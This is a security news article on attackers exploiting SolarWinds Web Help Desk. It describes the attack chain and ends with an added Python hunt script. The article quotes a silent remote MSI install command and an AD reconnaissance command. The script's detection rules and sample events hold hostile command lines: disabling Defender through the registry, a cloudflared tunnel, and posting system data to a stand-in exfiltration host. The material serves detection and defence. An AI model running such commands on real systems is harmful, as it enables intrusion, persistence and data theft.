Attackers Actively Exploiting SolarWinds Web Help Desk Flaw to Seize Control

Cybersecurity teams are raising the alarm as threat actors are now actively and aggressively exploiting a critical vulnerability in SolarWinds Web Help Desk (WHD). This remote code execution flaw is being weaponized to install custom tooling, enabling full system compromise and lateral movement across networks.

The Initial Breach
The attack chain begins with the exploitation of a WHD vulnerability. Security firm Huntress, which observed 84 vulnerable WHD instances across 78 customer environments, reported that attackers used the flaw to execute commands via the service wrapper (wrapper.exe). This initial access was quickly leveraged to silently fetch and install a malicious MSI package from a remote server using a command like:
msiexec /q /i hxxps://files.catbox[.]moe/example.msi

Deployment of RMM for Persistent Access
The first-stage payload was a legitimate Zoho ManageEngine remote monitoring and management (RMM) agent, hosted on the Catbox file-sharing service. While Zoho Assist is a commercial remote support tool, the attackers configured it with an attacker-controlled account (tied to a Proton Mail address) to establish persistent, hands-on access to the compromised system. This tactic aligns with a Microsoft warning from February 6th about active exploitation of SolarWinds WHD issues.

Reconnaissance and Escalation
With a foothold established, the attacker performed manual reconnaissance, investigating Active Directory with commands like net group "domain computers" /domain to map the network for lateral movement.

The attacker then deployed Velociraptor, a powerful open-source digital forensics and incident response (DFIR) platform, turning a defender's tool into an offensive command-and-control (C2) framework. An outdated and vulnerable version (0.73.4) was installed via another silent MSI from a Supabase storage bucket. The client communicated with an attacker-controlled server fronted by a Cloudflare Worker.

Strengthening the Foothold
With Velociraptor running as a Windows service, the attacker executed a rapid series of PowerShell commands to:

  1. Disable Windows Defender and the local firewall via registry edits.
  2. Install cloudflared from GitHub to establish a resilient backup network tunnel.
  3. Use Get-ComputerInfo to harvest detailed system data.
  4. Exfiltrate that stolen data directly to the attackers' own Elastic Cloud instance via the Bulk API, ironically weaponizing the Elastic SIEM as a victim management dashboard.

A Concerning Pattern of "Living-off-the-Land"
This campaign demonstrates the frightening speed with which attackers can pivot from a single exposed management interface to total network control. By leveraging common administrative and security tools (RMM agents, Velociraptor, Cloudflared, Elastic), their activities blend into normal network traffic, making detection difficult.

Immediate Action Required
If your organization uses SolarWinds Web Help Desk, you must act immediately:

  • Patch: Update to Web Help Desk version 2026.1 or later. This addresses the critical flaws tracked as CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551.
  • Isolate: Remove all administrative interfaces from direct internet access.
  • Investigate: Assume compromise. Change credentials, audit systems for unauthorized remote access software, silent MSI installs, and unusual code execution from WHD processes.
  • Hunt: The rapid weaponization indicates active scanning. Defenders should hunt for the TTPs and tools mentioned, particularly unexpected Zoho Assist, Velociraptor, or Cloudflared deployments.
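To make the hunt concrete, the following is an added example (not Huntress's, SolarWinds' or any vendor's code) that runs a small set of detection rules over process-creation events covering each stage described above: the WHD service wrapper (wrapper.exe) spawning a shell or installer, msiexec fetching a package over HTTP(S), the net group "domain computers" /domain query, Velociraptor running or spawning children, registry-based Defender or firewall tampering, cloudflared tunnel start-up, and Get-ComputerInfo output piped to a web request. The event records, host names, install paths and URLs are constructed for the example; the field names (host, parent_image, image, command_line) are assumptions about whatever telemetry source (Sysmon Event ID 1, Security 4688, an EDR) a defender would actually feed in.

```python
"""Hunt rules for the WHD intrusion chain described above.

Added example, not Huntress's, SolarWinds' or any vendor's code. Events are
constructed process-creation records; field names and paths are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Children the WHD service wrapper has no business launching (assumed list).
SHELLS_AND_INSTALLERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "msiexec.exe"}
_REMOTE_MSI = re.compile(r"msiexec(?:\.exe)?\s.*\bhttps?://\S+\.msi", re.I)
_AD_RECON = re.compile(r'\bnet1?(?:\.exe)?\s+group\s+"?domain\s+computers"?\s+/domain', re.I)
_TAMPER = re.compile(r"DisableAntiSpyware|DisableRealtimeMonitoring|EnableFirewall"
                     r"|advfirewall\s+set\s+\w+\s+state\s+off", re.I)
_TUNNEL = re.compile(r"cloudflared(?:\.exe)?\s+(?:tunnel|service)|trycloudflare\.com", re.I)
_INVENTORY_EXFIL = re.compile(r"Get-ComputerInfo.*(?:Invoke-RestMethod|Invoke-WebRequest|_bulk)", re.I)


def whd_wrapper_spawns_child(e: ProcEvent) -> bool:
    """Initial access: wrapper.exe launching a shell or installer."""
    return _basename(e.parent_image) == "wrapper.exe" and _basename(e.image) in SHELLS_AND_INSTALLERS


def msiexec_remote_package(e: ProcEvent) -> bool:
    """msiexec pulling a package over HTTP(S); /q (silent) or not, it is worth a look."""
    return bool(_REMOTE_MSI.search(e.command_line))


def ad_recon(e: ProcEvent) -> bool:
    """Domain-computer enumeration used to map targets for lateral movement."""
    return bool(_AD_RECON.search(e.command_line))


def velociraptor_activity(e: ProcEvent) -> bool:
    """Velociraptor running, or spawning a child, where no DFIR deployment is expected."""
    return "velociraptor" in _basename(e.image) or "velociraptor" in _basename(e.parent_image)


def defense_tamper(e: ProcEvent) -> bool:
    """Registry or netsh changes that switch off Defender or the host firewall."""
    return bool(_TAMPER.search(e.command_line))


def cloudflared_tunnel(e: ProcEvent) -> bool:
    """cloudflared starting a tunnel: the backup channel described in the article."""
    return bool(_TUNNEL.search(e.command_line))


def inventory_exfil(e: ProcEvent) -> bool:
    """Get-ComputerInfo output handed straight to a web request (e.g. an Elastic _bulk endpoint)."""
    return bool(_INVENTORY_EXFIL.search(e.command_line))


RULES = [(f.__name__, f) for f in (whd_wrapper_spawns_child, msiexec_remote_package, ad_recon,
                                   velociraptor_activity, defense_tamper, cloudflared_tunnel,
                                   inventory_exfil)]


def hunt(events):
    """Return (rule_name, host, command_line) for every event that trips a rule."""
    return [(name, e.host, e.command_line) for e in events for name, rule in RULES if rule(e)]


def hosts_by_rule(findings):
    """Group the hosts that tripped each rule, for a quick triage view."""
    out = {}
    for name, host, _ in findings:
        out.setdefault(name, set()).add(host)
    return out


# Constructed sample telemetry: one compromised WHD server, one clean file server.
SAMPLE_EVENTS = [
    ProcEvent("WHD01", r"C:\Program Files\WebHelpDesk\bin\wrapper.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c msiexec /q /i https://files.example.invalid/example.msi"),
    ProcEvent("WHD01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\net.exe",
              'net group "domain computers" /domain'),
    ProcEvent("WHD01", r"C:\Windows\System32\msiexec.exe", r"C:\Program Files\Velociraptor\Velociraptor.exe",
              r"Velociraptor.exe --config C:\Program Files\Velociraptor\client.config.yaml client"),
    ProcEvent("WHD01", r"C:\Program Files\Velociraptor\Velociraptor.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -nop -c Set-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1"),
    ProcEvent("WHD01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Users\Public\cloudflared.exe",
              "cloudflared.exe tunnel run --token <constructed-token>"),
    ProcEvent("WHD01", r"C:\Program Files\Velociraptor\Velociraptor.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c Get-ComputerInfo | ConvertTo-Json | Invoke-RestMethod -Method Post -Uri https://exfil.example.invalid:9243/_bulk"),
    ProcEvent("FS02", r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p"),
    ProcEvent("FS02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe", r"msiexec /i C:\installers\7zip.msi"),
]

if __name__ == "__main__":
    for rule, host, cmd in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {cmd}")
```

The rules are deliberately narrow so the benign local msiexec install and the ordinary svchost launch on FS02 produce nothing; in a real environment, replace SAMPLE_EVENTS with records read from your EDR or SIEM export, and treat any host that trips the wrapper.exe or remote-MSI rule as a starting point for the full assumed-compromise investigation the article calls for.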

With exploitation spreading, a proactive and assumed-compromise stance is essential for defense.
